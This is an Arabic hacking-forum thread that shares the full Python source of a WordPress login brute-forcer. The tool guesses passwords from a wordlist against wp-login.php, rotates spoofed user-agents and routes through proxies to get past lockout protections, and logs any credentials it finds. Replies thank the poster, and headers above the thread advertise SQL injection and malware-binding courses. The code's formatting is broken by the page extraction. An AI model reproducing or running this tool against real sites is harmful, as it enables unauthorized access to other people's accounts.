1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ أداة ] WordPress BT بلغة البايثون

الموضوع في 'قسم الأدوات' بواسطة GhoosT, بتاريخ ‏12 مارس 2013.

كاتب الموضوع : GhoosT المشاهدات : 2,326 الردود : 5 ‏12 مارس 2013
حالة الموضوع:
مغلق
  1. غير متصل

    GhoosT
    rankrank
    Developer

    عضو منذ:
    ‏7 سبتمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الوظيفة:
    مهندس معماري + تاجر
    الإقامة:

    السلام عليكم ورحمة الله وبركاته

    أداة تخمين على الوردبريس بلغة البايثون



    ملاحظة هامة تحتاج الاداة أيضآ كومبيلر لكل مكتبات الباثون الاظافية تقريبآ

    و تنبيه آخر يوجد بلوغن يوضع كحماية بالوربريس يعطيك 3 او 4 محاولات عن كل ادرس ابي لذا وضعت خاصية البروكسي بها
    السورس :


    كود PHP:
     #!/usr/bin/python
     # This is wordpress bruteforcer tools
     # This was written for educational purpose and pentest only. Use it at your own risk.
     # Author will not be responsible for any damage !!
     # Toolname  : wpbruteforcer.py
     # Programmer    : gunslinger_ <yudha.gunslinger@gmail.com>
     # Version   : 1.0
     # Date      : Wed Aug  4 13:38:13 WIT 2010

     
    import re
     import os
     import sys
     import random
     import warnings
     import time
     
    try:
         
    import mechanize
     except ImportError
    :
         print 
    "
    [*] Please install mechanize python module first"
         
    sys.exit(1)
     
    except KeyboardInterrupt:
         print 
    "n
    [*] Exiting program...n"
         
    sys.exit(1)
     try:
         
    import cookielib
     except ImportError
    :
         print 
    "
    [*] Please install cookielib python module first"
         
    sys.exit(1)
     
    except KeyboardInterrupt:
         print 
    "n
    [*] Exiting program...n"
         
    sys.exit(1)

     
    warnings.filterwarnings(action="ignore"message=".*gzip transfer encoding is experimental!"category=UserWarning)

     
    # define variable
     
    __programmer__  "gunslinger_ <yudha.gunslinger@gmail.com>"
     
    __version__     "1.0"
     
    verbose     False
     useproxy    
    False
     usepassproxy    
    False
     log     
    'wpbruteforcer.log'
     
    file        open(log"a")
     
    success     'Dashboard'
     
    # some cheating ..
     
    ouruseragent    = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
             
    'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
             
    'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
             
    'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
                 
    'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
                 
    'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
                 
    'Microsoft Internet Explorer/4.0b1 (Windows 95)',
                 
    'Opera/8.00 (Windows NT 5.1; U; en)',
             
    'amaya/9.51 libwww/5.4.0',
             
    'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
             
    'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
             
    'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
             
    'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
             
    'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
             
    'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
             
    ]
     
    wordpress   '''
                            _
                           | |
     __      _____  _ __ __| |_ __  _ __ ___  ___ ___
       / / / _ | '
    ___` | '_ | '__/ _ / __/ __|
       V  V / (_) | | | (_| | |_) | | |  __/\__ \__ \
       _/_/ \___/|_|  __,_| .__/|_|  \___||___/___/
                             | |
                             |_|      bruteforcer...

     Programmer : %s
     Version    : %s''' % (__programmer__, __version__)
     option          = '''
     Usage  : %s [options]
     Option : -t, --target       <hostname>    |   Site for bruteforce wp-admin
              -u, --username     <username>        |   User for bruteforcing
              -w, --wordlist     <filename>        |   Wordlist used for bruteforcing
              -v, --verbose              |   Set %s will be verbose (more talkactiveable)
              -p, --proxy        <host:port>   |   Set http proxy will be use
              -k, --usernameproxy    <username>    |   Set username at proxy will be use
              -i, --passproxy    <password>    |   Set password at proxy will be use
              -l, --log      <filename>    |   Specify output filename (default : fbbruteforcer.log)
              -h, --help         <help>            |   Print this help

     Example : %s -t target.com -u jack -w wordlist.txt"

     P.S : add "&" to run in the background
     ''' % (sys.argv[0], sys.argv[0], sys.argv[0])
     hme         = '''
     Usage : %s [option]
         -h or --help for get help
         ''' % sys.argv[0]


     def helpme():
         print wordpress
         print option
         file.write(wordpress)
         file.write(option)
         sys.exit(1)

     def helpmee():
         print wordpress
         print hme
         file.write(wordpress)
         file.write(hme)
         sys.exit(1)

     for arg in sys.argv:
         try:
             if arg.lower() == '-u' or arg.lower() == '--user':
                         username = sys.argv[int(sys.argv[1:].index(arg))+2]
                 if arg.lower() == '-t' or arg.lower() == '--target':
                         target = sys.argv[int(sys.argv[1:].index(arg))+2]
                         if "http://" in target:
                             target = target.replace("http://","")
                         if "www." in target:
                             target = target.replace("www.","")
                         targetsite = "http://www."+target+"/wp-login.php"
             elif arg.lower() == '-w' or arg.lower() == '--wordlist':
                         wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
                 elif arg.lower() == '-l' or arg.lower() == '--log':
                         log = sys.argv[int(sys.argv[1:].index(arg))+2]
                 elif arg.lower() == '-p' or arg.lower() == '--proxy':
                     useproxy = True
                         proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
                 elif arg.lower() == '-k' or arg.lower() == '--userproxy':
                     usepassproxy = True
                         usw = sys.argv[int(sys.argv[1:].index(arg))+2]
                 elif arg.lower() == '-i' or arg.lower() == '--passproxy':
                     usepassproxy = True
                         usp = sys.argv[int(sys.argv[1:].index(arg))+2]
             elif arg.lower() == '-v' or arg.lower() == '--verbose':
                         verbose = True
                 elif arg.lower() == '-h' or arg.lower() == '--help':
                     helpme()
             elif len(sys.argv) <= 1:
                 helpmee()
         except IOError:
             helpme()
         except NameError:
             helpme()
         except IndexError:
             helpme()

     def bruteforce(word):
         try:
             sys.stdout.write("r
    [*] Trying %s...                   ttttttttttttttttttttttttt " % word)
             file.write("
    [*] Trying %sn" % word)
             sys.stdout.flush()
             br.addheaders = [('User-agent', random.choice(ouruseragent))]
             opensite = br.open(targetsite)
             br.select_form(nr=0)
             br.form['log'] = username
             br.form['pwd'] = word
             br.submit()
             response = br.response().read()
             if verbose:
                 print response
             if success in response:
                 print "nn
    [*] Logging in success..."
                 print "
    [*] Username : %s" % (username)
                 print "
    [*] Password : %sn" % (word)
                 file.write("n
    [*] Logging in success...")
                 file.write("n
    [*] Username : %s" % (username))
                 file.write("n
    [*] Password : %snn" % (word))
                 sys.exit(1)
         except KeyboardInterrupt:
             print "n
    [*] Exiting program...n"
             sys.exit(1)
         except mechanize._mechanize.FormNotFoundError:
             print "n
    [*] Can't launch attack sorry, form is differentn"
             file.write("n
    [*] Can't launch attack sorry, form is differentn")
             sys.exit(1)
         except mechanize._form.ControlNotFoundError:
             print "n
    [*] Can't launch attack sorry, form is differentn"
             file.write("n
    [*] Can't launch attack sorry, form is differentn")
             sys.exit(1)

     def releaser():
         global word
         for word in words:
             bruteforce(word.replace("n",""))

     def main():
         global br
         global words
         try:
             br = mechanize.Browser()
             cj = cookielib.LWPCookieJar()
             br.set_cookiejar(cj)
             br.set_handle_equiv(True)
             br.set_handle_gzip(True)
             br.set_handle_redirect(True)
             br.set_handle_referer(True)
             br.set_handle_robots(False)
             br.set_debug_http(False)
             br.set_debug_redirects(False)
             br.set_debug_redirects(False)
             br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
             if useproxy:
                 br.set_proxies({"http": proxy})
             if usepassproxy:
                 br.add_proxy_password(usw, usp)
             if verbose:
                 br.set_debug_http(True)
                 br.set_debug_redirects(True)
                 br.set_debug_redirects(True)
         except KeyboardInterrupt:
             print "n
    [*] Exiting program...n"
             file.write("n
    [*] Exiting program...n")
             sys.exit(1)
         try:
             preventstrokes = open(wordlist, "r")
             words          = preventstrokes.readlines()
             count          = 0
             while count < len(words):
                 words[count] = words[count].strip()
                 count += 1
         except IOError:
             print "n
    [*] Error: Check your wordlist pathn"
             file.write("n
    [*] Error: Check your wordlist pathn")
             sys.exit(1)
         except NameError:
             helpme()
         except KeyboardInterrupt:
             print "n
    [*] Exiting program...n"
             file.write("n
    [*] Exiting program...n")
             sys.exit(1)
         try:
             print wordpress
             print "n
    [*] Starting attack at %s" % time.strftime("%X")
             print "
    [*] Target site : %s" % (targetsite)
             print "
    [*] Account for bruteforcing "%s"" % (username)
             print "
    [*] Loaded :",len(words),"words"
             print "
    [*] Bruteforcing wp-login, please wait..."
             file.write(wordpress)
             file.write("n
    [*] Starting attack at %s" % time.strftime("%X"))
             file.write("n
    [*] Target site : %s" % (targetsite))
             file.write("n
    [*] Account for bruteforcing "%s"" % (username))
             file.write("n
    [*] Loaded : %d words" % int(len(words)))
             file.write("n
    [*] Bruteforcing wp-login, please wait...n")
         except KeyboardInterrupt:
             print "n
    [*] Exiting program...n"
             sys.exit(1)
         try:
             releaser()
             bruteforce(word)
         except NameError:
             helpme()

     if __name__ == '__main__':
         main() 
     


    جاري تحميل الصفحة...
  2. غير متصل

    kasm
    DeveloPer Plus

    عضو منذ:
    ‏6 نوفمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: WordPress BT بلغة البايثون

    مشكور اخي على الأداة
    )5:"​
     


  3. غير متصل

    ÍяâΘ
    rankrank
    Developer

    عضو منذ:
    ‏30 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: WordPress BT بلغة البايثون

    وعليكم السلام

    يعطيك العافية يا رب


    :{2}::{2}:​
     


  4. غير متصل

    زعيم الهكر
    rank
    Developer

    عضو منذ:
    ‏12 مارس 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: WordPress BT بلغة البايثون

    يعطيك الف عافيه اخى على الموضوع

    تم التقييم قبل الرد تستاهل اكثر
    :{1}:​
     


  5. غير متصل

    Red-StOnE
    rankrank
    Developer

    عضو منذ:
    ‏29 مايو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:

    رد: WordPress BT بلغة البايثون

    بآرك آلله فيك آخي آلكريم
     


  6. غير متصل

    واحد من البشر
    rank
    Developer

    عضو منذ:
    ‏3 مارس 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: WordPress BT بلغة البايثون

    سلمت يداك
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...